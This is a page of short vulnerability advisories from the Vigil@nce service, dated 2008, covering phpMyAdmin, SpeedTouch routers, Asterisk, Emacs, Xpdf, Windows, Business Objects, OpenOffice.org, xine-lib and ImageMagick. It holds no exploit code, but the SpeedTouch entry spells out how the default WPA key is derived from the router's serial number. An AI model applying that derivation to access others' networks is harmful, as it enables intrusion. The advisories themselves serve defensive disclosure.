The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.
History of vulnerabilities analyzed by Vigil@nce:

vulnerability alert CVE-2008-1924

phpMyAdmin: file disclosure

Synthesis of the vulnerability

An attacker can use a HTTP POST query in order to read files of the computer where phpMyAdmin is installed.
Impacted products: Debian, openSUSE, phpMyAdmin, SLES.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 23/04/2008.
Identifiers: BID-28906, CERTA-2002-AVI-203, CVE-2008-1924, DSA-1557-1, MDVSA-2008:131, PMASA-2008-3, SUSE-SR:2008:026, SUSE-SR:2009:003, VIGILANCE-VUL-7781.

Description of the vulnerability

The phpMyAdmin program is used to administer a MySQL database.

The setLocalSelectedFile() method of File class (phpMyAdmin/libraries/File.class.php) concatenates the name of the upload directory and the requested name (simplified):
  function setLocalSelectedFile($name) {
    $result_name = $GLOBALS['cfg']['UploadDir'] . PMA_securePath($name);
    ...
However, when an attacker uses POST data, the $GLOBALS['cfg']['UploadDir'] variable can be empty. The name of the result file is thus only equivalent to the name of the requested file.

An attacker can thus read files with rights of the web server. Attacker has to create a table to exploit this vulnerability.
Full Vigil@nce bulletin... (Free trial)

vulnerability 7780

Speedtouch: predictable WPA keys

Synthesis of the vulnerability

An attacker can use the SSID to predict the default WPA key.
Impacted products: SpeedTouch.
Severity: 1/4.
Consequences: data reading.
Provenance: radio connection.
Creation date: 23/04/2008.
Identifiers: BID-28893, VIGILANCE-VUL-7780.

Description of the vulnerability

Thomson Speedtouch routers are provided with a WPA key depending on the serial number of their device.

The algorithm used to generate this key was published. If the serial number is "CP0615JT109 (53)":
 - the CP0615109 value is extracted
 - the last 3 characters are converted to hexadecimal: CP0615313039
 - a SHA-1 hash is applied on CP0615313039 to obtain 742da831d2b657fa53d347301ec610e1ebf8a3d0
 - the last 6 characters are used for the SSID: SpeedTouchF8A3D0
 - the first 8 characters are used for the WPA key: 742DA831D2

With the full range of serial numbers, the attacker correlates the SSID and the WPA. For example, the SpeedTouchF8A3D0 SSID is associated to only two keys.

An attacker can thus guess the WPA key to access to victim's data.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability note CVE-2008-1897 CVE-2008-1923

Asterisk: denial of service of IAX2

Synthesis of the vulnerability

An attacker can spoof IAX2 messages in order to force Asterisk to send audio data.
Impacted products: Asterisk Open Source, Debian, Fedora.
Severity: 2/4.
Consequences: denial of service on client.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 23/04/2008.
Identifiers: AST-2008-006, BID-28901, CVE-2008-1897, CVE-2008-1923, DSA-1563-1, FEDORA-2008-3365, FEDORA-2008-3390, VIGILANCE-VUL-7779.

Description of the vulnerability

An IAX2 session is established via a handshake using NEW and ACK messages. If guest user is allowed, IAX2 sessions are not authenticated.

No random mechanism associates the ACK message to its NEW message. An attacker can spoof a NEW message and then an ACK message in order to force the creation of a new session.

An attacker can thus spoof the address of the victim in order to force Asterisk to send him audio data. This attack leads to a denial of service on victim's network.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin CVE-2008-1694

Emacs: altering a file via vcdiff

Synthesis of the vulnerability

A local attacker can alter a file when vcdiff of Emacs is used.
Impacted products: Mandriva Linux, Unix (platform) ~ not comprehensive.
Severity: 1/4.
Consequences: data creation/edition.
Provenance: user shell.
Creation date: 22/04/2008.
Identifiers: 208483, BID-28857, CVE-2008-1694, MDVSA-2008:096, VIGILANCE-VUL-7778.

Description of the vulnerability

The Emacs editor can connect to SCCS (Source Code Control System), an obsolete revision control system. The vcdiff tool is then called to compare files.

However, vcdiff creates a temporary file in an insecure manner named /tmp/geta$$. A local attacker can therefore predict the file name and create a symbolic link.

This vulnerability thus permits a local attacker to alter a file with rights of Emacs users.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability announce CVE-2008-1693

Xpdf: code execution via fonts

Synthesis of the vulnerability

An attacker can create a PDF document containing malicious character fonts in order to execute code on computer of victims opening this document with Xpdf or one of its derivatives.
Impacted products: Debian, Fedora, Mandriva Linux, openSUSE, RHEL, SLES.
Severity: 3/4.
Consequences: user access/rights.
Provenance: document.
Creation date: 18/04/2008.
Identifiers: BID-28830, CERTA-2002-AVI-200, CERTA-2008-AVI-220, CVE-2008-1693, DSA-1548-1, DSA-1606-1, FEDORA-2008-3312, MDVSA-2008:089, MDVSA-2008:173, MDVSA-2008:197, MDVSA-2008:197-1, RHSA-2008:0238-01, RHSA-2008:0239-01, RHSA-2008:0240-01, RHSA-2008:0262-01, SUSE-SR:2008:011, SUSE-SR:2008:013, VIGILANCE-VUL-7777.

Description of the vulnerability

A PDF document can use standard fonts (Courier, Helvetica, Times-Roman, Symbol) or incorporate its own embedded font definitions.

However, if an embedded font is malformed, a memory corruption occurs in Xpdf when the document is opened.

An attacker can therefore create a PDF document containing malicious character fonts in order to execute code on computer of victims opening this document with Xpdf or one of its derivatives.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability alert CVE-2008-1436 CVE-2009-0078 CVE-2009-0079

Windows: privilege elevation

Synthesis of the vulnerability

A authenticated attacker, in the NetworkService or LocalService context, can elevate his privileges to LocalSystem.
Impacted products: IIS, SQL Server, Windows 2000, Windows 2003, Windows 2008 R0, Windows Vista, Windows XP.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user account.
Number of vulnerabilities in this bulletin: 4.
Creation date: 18/04/2008.
Revisions dates: 21/04/2008, 29/08/2008, 09/10/2008, 14/10/2008, 15/04/2009.
Identifiers: 951306, 959454, BID-28833, BID-34442, BID-34443, BID-34444, CERTA-2009-AVI-142, CVE-2008-1436, CVE-2009-0078, CVE-2009-0079, CVE-2009-0080, MS09-012, VIGILANCE-VUL-7776.

Description of the vulnerability

A user can execute code in NetworkService or LocalService contexts:
 - via IIS : code as an ISAPI filter/extension
 - via IIS : ASP.NET code run as "full trust"
 - via SQL Server : privilege to load and run code
 - via MSDTC (Windows 2003 Microsoft Distributed Transaction Coordinator)

However, these feature do no correctly isolate their processes. A code which runs in the NetworkService/LocalService context can thus elevate its privileges to LocalSystem. Four vulnerabilities can be exploited.

The MSDTC (Microsoft Distributed Transaction Coordinator) allows the NetworkService token to be used for a RPC call. [severity:2/4; CERTA-2009-AVI-142, CVE-2008-1436]

An attacker can use WMI (Windows Management Instrumentation) to access to a process with SYSTEM privileges, and execute code. [severity:2/4; BID-34442, CVE-2009-0078]

An attacker can use the RPCSS service to obtain LocalSystem privileges. [severity:2/4; BID-34443, CVE-2009-0079]

Incorrect ACLs (Access Control Lists) are set on the current ThreadPool, which can be used by a local attacker to acquire LocalSystem privileges. [severity:2/4; BID-34444, CVE-2009-0080]

An authenticated attacker can thus obtain administrative privileges on the system.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability 7775

Business Object: Cross Site Scripting

Synthesis of the vulnerability

An attacker can create a Cross Site Scripting with the cms variable of Business Object Infoview XI R2.
Impacted products: Business Objects.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 17/04/2008.
Identifiers: VIGILANCE-VUL-7775.

Description of the vulnerability

The Java version of Business Object Infoview XI R2 has a vulnerable authentication form.

Indeed, the cms variable is not filtered before being displayed.

An attacker can therefore generate a Cross Site Scripting in order for example to execute Javascript code in the context of the victim.
Full Vigil@nce bulletin... (Free trial)

vulnerability note CVE-2007-4770 CVE-2007-4771 CVE-2007-5745

OpenOffice.org: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of OpenOffice.org can be used by an attacker to execute code on computer of victims opening a malicious document.
Impacted products: OpenOffice, Debian, Fedora, Mandriva Linux, Windows (platform) ~ not comprehensive, openSUSE, Solaris, Trusted Solaris, RHEL, Unix (platform) ~ not comprehensive.
Severity: 3/4.
Consequences: user access/rights, denial of service on client.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 4.
Creation date: 17/04/2008.
Identifiers: 231601, 231641, 231642, 231661, 6633029, 6633041, 6657640, 6660931, BID-28819, CERTA-2008-AVI-123, CERTA-2008-AVI-218, CVE-2007-4770, CVE-2007-4771, CVE-2007-5745, CVE-2007-5746, CVE-2007-5747, CVE-2008-0320, DSA-1547-1, FEDORA-2008-3251, FEDORA-2008-4104, MDVSA-2008:090, MDVSA-2008:095, RHSA-2008:0175-01, RHSA-2008:0176-01, SUSE-SA:2008:023, VIGILANCE-VUL-7774.

Description of the vulnerability

Several vulnerabilities of OpenOffice.org can be used by an attacker to execute code on computer of victims opening a malicious documents.

A heap overflow can occur when opening an ODF document containing XForms. [severity:3/4; CERTA-2008-AVI-123, CERTA-2008-AVI-218, CVE-2007-4770, CVE-2007-4771]

A heap overflow can occur when opening a Quattro Pro document. [severity:3/4; CVE-2007-5745, CVE-2007-5747]

A heap overflow can occur when opening an EMF image. [severity:3/4; CVE-2007-5746]

A heap overflow can occur when opening a document containing OLE objects. [severity:3/4; CVE-2008-0320]
Full Vigil@nce bulletin... (Free trial)

vulnerability bulletin CVE-2008-1878 CVE-2008-1964

xine-lib: buffer overflow of NSF

Synthesis of the vulnerability

An attacker can create a malicious MP3 file in order to create an overflow during the NSF analysis.
Impacted products: Debian, Fedora, openSUSE, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: user access/rights, denial of service on client.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 17/04/2008.
Revision date: 24/04/2008.
Identifiers: BID-28816, BID-28908, CVE-2008-1878, CVE-2008-1964, DSA-1586-1, FEDORA-2008-3326, FEDORA-2008-3353, SUSE-SR:2008:012, VIGILANCE-VUL-7773.

Description of the vulnerability

The src/demuxers/demux_nsf.c file of xine-lib decodes data in NES Music File Format. It has two vulnerabilities.

The demux_nsf_send_chunk() function stores the title in a 100 bytes array, without checking data size. [severity:2/4; BID-28816, CVE-2008-1878]

The demux_nsf_send_headers() function stores the copyright in a 100 bytes array, without checking data size. [severity:1/4; BID-28908, CVE-2008-1964]

An attacker can create a MP3 file containing a long NSF title, then invite the victim to open it with an application linked to xine-lib. An overflow thus occurs and leads to a denial of service or to code execution.
Full Vigil@nce bulletin... (Free trial)

vulnerability announce CVE-2008-1096 CVE-2008-1097

ImageMagick: memory corruptions via PCX or XCF

Synthesis of the vulnerability

An attacker can create a malicious PCX or XCF image leading to a denial of service or to code execution on computers of ImageMagick users.
Impacted products: Debian, Mandriva Linux, openSUSE, RHEL, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: user access/rights, denial of service on client.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 17/04/2008.
Identifiers: 285861, 286411, 413034, 414370, BID-28821, BID-28822, CVE-2008-1096, CVE-2008-1097, DSA-1858-1, DSA-1903-1, MDVSA-2008:099, RHSA-2008:0145-01, RHSA-2008:0165-01, SUSE-SR:2008:014, VIGILANCE-VUL-7772.

Description of the vulnerability

Several vulnerabilities can occur in ImageMagick.

A malicious XCF image corrupts the memory of the load_tile() function of coders/xcf.c. [severity:2/4; 286411, 414370, BID-28821, CVE-2008-1096]

A malicious PCX image corrupts the memory of the ReadPCXImage() function of coders/pcx.c. [severity:2/4; 285861, 413034, BID-28822, CVE-2008-1097]

An attacker can therefore invite user to open a PCX or XCF image with ImageMagick in order to generate a denial of service or to run code on his computer.
Full Vigil@nce bulletin... (Free trial)

Previous page   Next page

Direct access to page 1 21 41 61 81 101 121 141 161 181 201 221 241 261 281 301 321 341 361 381 401 421 441 461 481 501 521 541 561 581 601 621 641 661 681 701 721 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 761 781 801 821 841 861 881 901 921 941 961 981 1001 1021 1041 1061 1081 1101 1121 1141 1161 1181 1201 1221 1241 1261 1281 1301 1321 1341 1361 1381 1401 1421 1441 1461 1481 1501 1521 1541 1561 1581 1601 1621 1641 1661 1681 1701 1721 1741 1761 1781 1801 1821 1841 1861 1881 1901 1921 1941 1961 1981 2001 2021 2041 2061 2081 2101 2121 2141 2161 2181 2201 2221 2241 2261 2281 2301 2321 2341 2361 2381 2401 2421 2441 2461 2481 2501 2521 2541 2561 2581 2601 2621 2641 2661 2681 2701 2721 2741 2761 2781 2801 2821 2841 2861 2881 2900